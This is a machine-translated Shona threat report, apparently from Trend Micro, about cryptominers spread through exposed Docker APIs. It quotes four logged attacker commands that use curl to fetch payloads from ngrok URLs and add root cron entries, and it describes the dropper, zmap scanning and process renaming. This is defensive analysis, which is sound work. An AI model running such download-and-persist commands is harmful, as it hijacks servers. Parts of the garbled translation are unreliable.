Isu takaongorora iyo data yakaunganidzwa tichishandisa midziyo yehuchi, iyo yatakagadzira kuronda kutyisidzira. Uye isu takaona chiitiko chakakosha kubva kune vasingadiwe kana vasina kubvumidzwa cryptocurrency miners vakaiswa semidziyo ine hukasha vachishandisa nharaunda-yakaburitswa mufananidzo paDocker Hub. Mufananidzo uyu unoshandiswa sechikamu chesevhisi inoburitsa yakaipa cryptocurrency miners.
Pamusoro pezvo, zvirongwa zvekushanda nemanetiweki zvakaiswa kuti zvipinde zvakavhurika midziyo uye maapplication.
Isu tinosiya midziyo yedu yeuchi sezvairi, kureva, neyakagadzika marongero, pasina matanho ekuchengetedza kana kuteedzera kuiswa kwesoftware. Ndokumbira utarise kuti Docker ine kurudziro yekutanga kuseta kudzivirira zvikanganiso uye nyore kusasimba. Asi mapoto anoshandiswa midziyo, yakagadzirirwa kuona kurwiswa kwakanangana nepuratifomu yekutakura, kwete maapplication ari mukati memidziyo.
Iyo yakaonekwa hutsinye chiitiko chinocherechedzwa zvakare nekuti haidi kusarongeka uye zvakare yakazvimiririra kubva kuDocker vhezheni. Kutsvaga yakarongedzerwa zvisizvo, uye saka yakavhurika, mufananidzo wemudziyo ndizvo zvese zvinodikanwa nevanorwisa kutapurira akawanda akavhurika maseva.
Iyo isina kuvharwa Docker API inobvumira mushandisi kuita akasiyana siyana , kusanganisira kuwana runyoro rwemidziyo inomhanya, kutora matanda kubva kune chaiyo mudziyo, kutanga, kumisa (kusanganisira kumanikidzwa) uye kunyange kugadzira mudziyo mutsva kubva kune chaiwo mufananidzo une yakatarwa marongero.
Kuruboshwe ndiyo nzira yekuendesa malware. Kurudyi kune nharaunda yeanorwisa, iyo inobvumira kure kure kubuda kwemifananidzo.
Kugoverwa nenyika ye3762 yakavhurika Docker APIs. Kubva pakutsvaga kweShodan kwemusi wa 12.02.2019/XNUMX/XNUMX
Attack cheni uye payload sarudzo
Basa rakashata rakaonekwa kwete chete nerubatsiro rwehuchi. Dhata kubva kuShodan inoratidza kuti nhamba yeDocker APIs yakafumurwa (ona yechipiri girafu) yakawedzera kubva patakaongorora chigadziko chisina kurongeka chinoshandiswa sebhiriji kuendesa Monero cryptocurrency mining software. Muna Gumiguru gore rapfuura (2018, data yazvino approx. mushanduri) kwaingova ne856 akavhurika APIs.
Kuongororwa kwematanda ehuchi kwakaratidza kuti kushandiswa kwemufananidzo wemudziyo kwakabatana nekushandiswa kwe , chishandiso chekumisikidza kubatanidza kwakachengeteka kana kutumira traffic kubva kunzvimbo dzinosvikika kune veruzhinji kuenda kune yakatsanangurwa kero kana zviwanikwa (semuenzaniso localhost). Izvi zvinobvumira vanorwisa kuti vagadzire zvine simba maURL kana vachiendesa payload kune yakavhurika server. Pazasi pane kodhi mienzaniso kubva kumatanda anoratidza kushungurudzwa kweiyo ngrok sevhisi:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Sezvauri kuona, mafaera akaiswa anotorwa kubva kunogara achichinja maURL. Aya ma URL ane nguva pfupi yekupera, saka mihoro haigone kudhawunirodha mushure mezuva rekupera.
Pane nzira mbiri dzekubhadhara. Yekutanga ndeye ELF mugodhi weLinux (inotsanangurwa seCoinminer.SH.MALXMR.ATNO) inobatanidza kune dziva rekuchera. Chechipiri chinyorwa (TrojanSpy.SH.ZNETMAP.A) chakagadzirirwa kuwana mamwe maturusi etiweki anoshandiswa kuongorora masanji enetiweki uyezve kutsvaga zvitsva zvinotangwa.
Iyo dropper script inoisa maviri akasiyana, ayo anobva ashandiswa kuendesa iyo cryptocurrency miner. The HOST variable ine URL apo mafaira ane utsinye anowanikwa, uye RIP yakasiyana-siyana ndiro zita refaira (chaizvoizvo, hashi) yemugodhi kuti aendeswe. Iyo HOST shanduko inoshanduka pese painochinja hashi. Iyo script inoedzawo kutarisa kuti hapana imwe cryptocurrency miners iri kumhanya pane yakarwiswa server.
Mienzaniso yeHOST neRIP akasiyana, pamwe nekodhi snippet inoshandiswa kutarisa kuti hapana vamwe vashandi vemigodhi vari kushanda.
Asati atanga mugodhi, anotumidzwa zita rekuti nginx. Dzimwe shanduro dzechinyorwa ichi dzinopa zita remugodhi kune mamwe masevhisi ari pamutemo anogona kunge aripo munzvimbo dzeLinux. Izvi zvinowanzokwana kuti upfuure cheki uchipesana nerondedzero yemaitiro ekumhanya.
Iyo yekutsvaga script inewo maitiro. Inoshanda neiyo yakafanana URL sevhisi kuendesa maturusi anodiwa. Pakati pavo pane zmap binary, iyo inoshandiswa kuongorora network uye kuwana runyorwa rweakavhurika madoko. Iyo script inotakurawo imwe bhinari iyo inoshandiswa kudyidzana neakawanikwa masevhisi uye kugamuchira mabhena kubva kwavari kuti aone rumwe ruzivo nezve yakawanikwa sevhisi (semuenzaniso, vhezheni yayo).
Iyo script zvakare inofanosarudza mamwe maseru etiweki ekuongorora, asi izvi zvinoenderana neshanduro yescript. Iyo zvakare inoseta zviteshi zvemasevhisi kubva kumasevhisi - mune iyi kesi, Docker - isati yatanga scan.
Pakangowanikwa zvinangwa zvinogoneka, mabhenji anobviswa otomatiki kubva kwavari. Iyo script zvakare inosefa zvinangwa zvinoenderana nemasevhisi, maapplication, zvikamu kana mapuratifomu ekufarira: Redis, Jenkins, Drupal, MODX, , Docker 1.16 mutengi uye Apache CouchDB. Kana iyo yakaongororwa sevha ichienderana nechero ipi zvayo, inochengetwa mufaira remavara, iro vanorwisa vanogona kuzoshandisa gare gare kuongororwa uye kubira. Aya mameseji mafaera anoiswa kune vanorwisa maseva kuburikidza neane simba link. Ndiko kuti, URL yakaparadzana inoshandiswa kune imwe neimwe faira, izvo zvinoreva kuti kunotevera kuwana kwakaoma.
Iyo yekurwisa vector mufananidzo weDocker, sezvinoonekwa muzvikamu zviviri zvinotevera zvekodhi.
Kumusoro kuri kupa zita rebasa riri pamutemo, uye pazasi pane mashandisirwo anoitwa zmap kuongorora network.
Kumusoro kwakafanotsanangurwa marenji etiweki, pazasi pane chaiwo madoko ekutsvaga masevhisi, kusanganisira Docker
Iyo skrini inoratidza kuti iyo alpine-curl mufananidzo yakatorwa kanopfuura mamirioni gumi
Kubva paAlpine Linux uye curl, chishandiso-chinoshanda CLI chishandiso chekufambisa mafaera pamusoro peakasiyana mapuroteni, unogona kuvaka. . Sezvauri kuona pamufananidzo wapfuura, mufananidzo uyu wakatorwa kare kanopfuura miriyoni gumi. Nhamba huru yekudhawunirodha inogona kureva kushandisa mufananidzo uyu sepokupinda; mufananidzo uyu wakagadziridzwa kupfuura mwedzi mitanhatu yapfuura; vashandisi havana kudhawunirodha mimwe mifananidzo kubva mune ino repository kazhinji. MuDocker - seti yemirairo inoshandiswa kugadzirisa mudziyo kuti uiite. Kana zvigadziriso zvekupinda zvisina kunaka (semuenzaniso, mudziyo unosiiwa wakavhurika kubva paInternet), mufananidzo unogona kushandiswa sevector yekurwisa. Vanorwisa vanogona kuishandisa kuendesa mubhadharo kana vakawana chigadziko chisina kurongeka kana chakavhurika chakasiiwa chisina kutsigirwa.
Zvakakosha kuziva kuti chifananidzo ichi (alpine-curl) pachacho hachisi chakaipa, asi sezvaunogona kuona pamusoro apa, chinogona kushandiswa kuita mabasa akaipa. Yakafanana Docker mifananidzo inogona zvakare kushandiswa kuita zvakaipa. Takataura naDocker tikashanda navo panyaya iyi.
kurumbidza
masaridzwa kumakambani mazhinji, kunyanya ayo ari kuita , yakanangana nekukura nekukurumidza uye kuburitsa. Zvese zvinowedzerwa nekudiwa kwekutevedzera maodhita uye yekutarisa mitemo, kukosha kwekutarisa kuvanzika kwedata, pamwe nekukuvara kwakakura kubva mukusatevedzera kwavo. Kubatanidza kuchengetedza otomatiki mune yekuvandudza hupenyu haingobatsire iwe kuwana maburi ekuchengetedza ayo angangoenda asina kuoneka, asi zvakare inokubatsira iwe kuderedza basa risingakoshere, sekumhanyisa mamwe masoftware anovaka kune yega yega yakawanikwa njodzi kana kusagadziriswa mushure mekunge application yaiswa.
Chiitiko chakurukurwa muchinyorwa chino chinosimbisa kukosha kwekurangarira kuchengeteka kubva pakutanga, kusanganisira zvinotevera kurudziro:
- Kune masystem administrator nevagadziri: Gara uchitarisa yako API marongero kuti uve nechokwadi chekuti zvese zvakagadziriswa kuti zvigamuchire zvikumbiro kubva kune chaiyo sevha kana yemukati network.
- Tevedza musimboti wekodzero shoma: ita shuwa kuti mifananidzo yemidziyo yakasainwa uye yakasimbiswa, dzikamisa kupinda kune zvakakosha zvinhu (container launch sevhisi) uye wedzera encryption kune network yekubatanidza.
- Tevera uye kugonesa nzira dzekuchengetedza, semuenzaniso. uye yakavakirwa-mukati .
- Shandisa otomatiki scanning yenguva yekumhanya nemifananidzo kuti uwane rumwe ruzivo nezve maitiro ari kuita mugaba (semuenzaniso, kuona spoofing kana kutsvaga kusasimba). Kudzora kwekushandisa uye kuvimbika kwekutarisa kunobatsira kuteedzera shanduko dzisina kujairika kumaseva, mafaera, uye nzvimbo dzehurongwa.
Trendmicro inobatsira zvikwata zveDevOps kuvaka zvakachengeteka, kuburitsa nekukurumidza, uye kuvhura chero kupi. Trend Micro Inopa yakasimba, yakakwenenzverwa, uye otomatiki kuchengetedza pane imwe sangano DevOps pombi uye inopa akawanda kutyisidzira kudzivirira. kuchengetedza muviri, chaiwo uye gore mabasa akawanda panguva yekumhanya. Inowedzerawo chengetedzo yemudziyo ne и , iyo inoongorora mifananidzo yeDocker yemidziyo yemalware uye kusagadzikana chero nguva mupombi yekuvandudza kudzivirira kutyisidzira kusati kwaiswa.
Zviratidzo zvekubvumirana
Hashes dzinoenderana:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
pamusoro Vakurukuri vanodzidzira vanoratidza marongero anofanirwa kutanga aitwa kuitira kuderedza mukana kana kudzivirira zvachose kuitika kwemamiriro atsanangurwa pamusoro. Uye muna Nyamavhuvhu 19-21 pane yakanyanya online Iwe unogona kukurukura izvi uye mamwe matambudziko ekuchengetedza akafanana nevaunoshanda navo uye vadzidzisi vanodzidzira patafura yakatenderera, apo munhu wese anogona kutaura uye kuteerera kumarwadzo uye kubudirira kwevanoshanda navo vane ruzivo.
Source: www.habr.com